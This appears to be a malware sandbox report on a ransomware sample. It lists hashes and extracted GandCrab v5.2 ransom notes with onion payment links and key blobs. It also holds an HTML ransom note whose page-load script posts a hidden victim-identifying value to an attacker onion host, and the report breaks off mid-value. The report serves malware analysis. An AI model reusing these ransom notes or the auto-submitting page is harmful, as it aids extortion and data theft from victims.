General

  • Target

    001.rar

  • Size

    2.8MB

  • Sample

    240720-sv7qds1hqk

  • MD5

    494b1f3661964eb30145a7617315dbdb

  • SHA1

    48078350d06abe5dfeaad51e4ad6b44768df905d

  • SHA256

    9e4a9e8f9c29c2307701b66b27404fdfed5770bbcba40c05edf046e5a3285975

  • SHA512

    5e111eb302950623e595b2c3e66c472d4b74e2441e28f48127ba1e603f3f5365ba0b68062d82049bd7111b62ea74db6972d34f55fbe50de2d4e22a5ac2344a22

  • SSDEEP

    49152:nw+6eMSIzGKwOpkdWZdQvYVpy6skn+/icU/6Sjd/9DhM1WN:yfSIzfpkdWZdh7dsk+KcYBpl1sWN

Malware Config

Extracted

Path

C:\Users\RNTKH-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .RNTKH The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/e8eea44c8df4c1c | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- 7ftDEgLb/ZS0lcmZbHM61KDJ6AOtD78KkA7absMgUXYxWLsC+5+UYF9xVmDz9NvJK5DNAuWVvODZRWXIKnQXQzua3LPyzokSUuglaqKXwabsGM4pXku5In6gtMQMqg7sgEh1XW1iPMFgiUj/s1LdWpJHdiPjMpn7rCZNO/A31mak0K8RefoREu3BxtlAsseHWfVIIKN0U4NnA3w0Ga7XDLlF3iOIB6ImYbF6Z/7MBN2mgBr2rZ2mU0R7+dxfWLoypoW25ypHEnKnMMuBl1Cmehqo5VrrnNSZu19KSVzOtTAymPz79ICyGBkpCKj0RQwVePfN00RSUyDNtO+JKNBcBiBqqsZtR+i3ZbGamdCR30eBP4ry6vM9LODjDaPvr3tWv+YKTznJt/bAL0J01/eNSzezgKAqoTvFqJ2HPDmx5ShGudnoMloV6iCVyemoqB5vY7wHrtoyoi8B1fOlXTmZ7rN4cOwygU+wTkywb+cfzdw/LWqjqbjWwFvi9DPXKP+ghY2cWKz+6gkLvCeiiYFcEv1EtSM9ANLhxdQDIBf1BEGWyeuMbp0J1h0/u+RWez0Et3TBCrbrZtdJPEKVLMopLrgbsAnNcG2VuLCZEZKsSbTenISaf0Ihb4k0t1Gacy3SiKIADBDFnYH2qA1whEaNxA== ---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/e8eea44c8df4c1c

Extracted

Path

F:\$RECYCLE.BIN\S-1-5-21-3450744190-3404161390-554719085-1000\YOEMLUCLFX-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .YOEMLUCLFX The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/754743142d13ad41 | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- 7ftDEgLb/ZS0lcmZbHM61KDJ6AOtD78KkA7absMgUXYxWLsC+5+UYF9xVmDu9NjJNZDAAu+Vs+DRRXPIKnQXQzua3LPyzokSUuglaqKXwabsGM4pXku5In6gtMQMqg7sgEh1XW1iPMFgiUj/s1LdWpJHdiPjMpn7rCZNO/A31mak0K8RefoREu3BxtlAsseHWfVIIKN0U4NnA3w0Ga7XDLlF3iOIB6ImYbF6Z/7MBN2mgBr2rZ2mU0R7+dxfWLoypoW25ypHEnKnMMuBl1Cmehqo5VrrnNSZu19KSVzOtTAymPz79ICyGBkpCKj0RQwVePfN00RSASDAtL6JetAJBidqr8Y6R+K3ZbHNmdeR3UfUP93y/fNzLOzjDaO2rwVWxuZ2TzbJpvbdL0N0zPfgSzCzhqApoTPFpp2CPDOx6ihEudzoNVoM6j2VyOmqqBlvZbwCrt4yoi8G1fylVjmT7qd4GuxOgTOwQUyhb/ofzNwkLQejqrjTwFji9zPbKPSghI2dWKf+5gkQvDGihIFfEv5EsSM5AN7hzdQVIFj1CUHPyeWMbZ0I1go/7uRQeyoEinT3CrvrP9dFPEuVLsohLq8b4AnecHqVubCDEZSsSLSNnIyaZEI9b5008FGYczrSlaIGDBHFzoGoqA9wiUaNxMzG ---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/754743142d13ad41

Extracted

Path

C:\Users\HJZMTGUT-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .HJZMTGUT The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/36504b3a41889fc1 | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- 7ftDEgLb/ZS0lcmZbHM61KDJ6AOtD78KkA7absMgUXYxWLsC+5+UYF9xVmDs9MzJJJDVAueVtODSRW3IKnQXQzua3LPyzokSUuglaqKXwabsGM4pXku5In6gtMQMqg7sgEh1XW1iPMFgiUj/s1LdWpJHdiPjMpn7rCZNO/A31mak0K8RefoREu3BxtlAsseHWfVIIKN0U4NnA3w0Ga7XDLlF3iOIB6ImYbF6Z/7MBN2mgBr2rZ2mU0R7+dxfWLoypoW25ypHEnKnMMuBl1Cmehqo5VrrnNSZu19KSVzOtTAymPz79ICyGBkpCKj0RQwVePfN00RSBSDDtL+JfdAJBnZqrcZvR+S3MLHEmdyRhUfWP4ry/fNzLOzjDaO2rwVWxuZ2TzbJpvbdL0N0zPfgSzCzhqApoTPFpp2CPDOx6ihEudzoNVoM6j2VyOmqqBlvZbwCrt4yoi8P1fylWjmX7q94GuxOgTOwQUyhb/ofzNwkLQejqrjTwFji9zPbKPSghI2dWKf+5gkQvDGihIFfEv5EsSM5AN7hzdQVIFj1CUHPyeWMbZ0I1go/7uRQeyoEinT3CrvrP9dFPEuVIcouLqwb4AnecHqVubCDEZSsSLSNnIyaZEI9b5008FGYczrSlaIGDBHFzoGoqA9wiUaNxMzG ---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/36504b3a41889fc1

Extracted

Path

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\[HOW_TO_DECRYPT_FILES].html

Ransom Note
<html> <head> <title>How can I recover my files ?</title> <style> html, body { font-family: lucida sans,tahoma,aerial,serif; font-size: 14px; overflow-x: hidden; background-color: #fff; padding-left: 1rem; } div.box { border: 1px dotted #212121; padding: 0.4rem; display: block; margin-top: 0.5rem; margin-bottom: 0.5rem; } input[type=submit] { border: none; padding: 0.1rem 0.7rem 0.1rem 0.7rem; background-color: #303f9f; color: #fff; } input[type=submit]:hover { background-color: #212121; } a { color: #212121; text-decoration: none; font-weight: bold; } a:hover { color: #3f51b5; text-decoration: underline; } </style> </head> <body onload="submit_form()"> <div style="margin: auto; max-width: 750px; padding: .5rem 1.5rem .5rem 1.5rem;"> <h3>What happened to my files ?</h3> <p> All of your important files were encrypted using a combination of <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Public-key_cryptography">RSA-2048</a> and <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">AES-256</a>. </p> <h3>What does this mean ?</h3> <p> This means that your files were modified in a way that makes working with them impossible, unless you have the keys to decrypt them. </p> <h3>Is it possible to recover my files ?</h3> <p> Yes, it possible to get your files back, you'll need a special program (decryptor) and the private key of the key pair used to encrypt them. </p> <h3>How can I get the decryptor and the private key ?</h3> <p> First, you'll need to synchronize your machine with our site, you can do this by clicking the button "Upload the KEY file". You can also manually upload the synchronization file <span style="border: 1px dotted #212121;padding: 0.1rem 0.3rem 0.1rem 0.3rem;">C:\Users\Public\Desktop\KEY</span> by visiting any of the links below. <span style="display: block; font-size: 0.8rem;">*This file contains information to identify your machine and the keys used to encrypt your files. However, those keys are encrypted and only our server can decrypt them.</span> </p> <p> After you've synchronized your machine with our server, you'll just need to follow the instructions there on how to pay for the decryption of your files. </p> <div style="text-align: center;padding-top: 0.5rem; padding-bottom: 0.5rem;"> <form id="infection_form" action="http://lockerrwhuaf2jjx.onion.sx" method="POST"> <input type="hidden" name="infection" value="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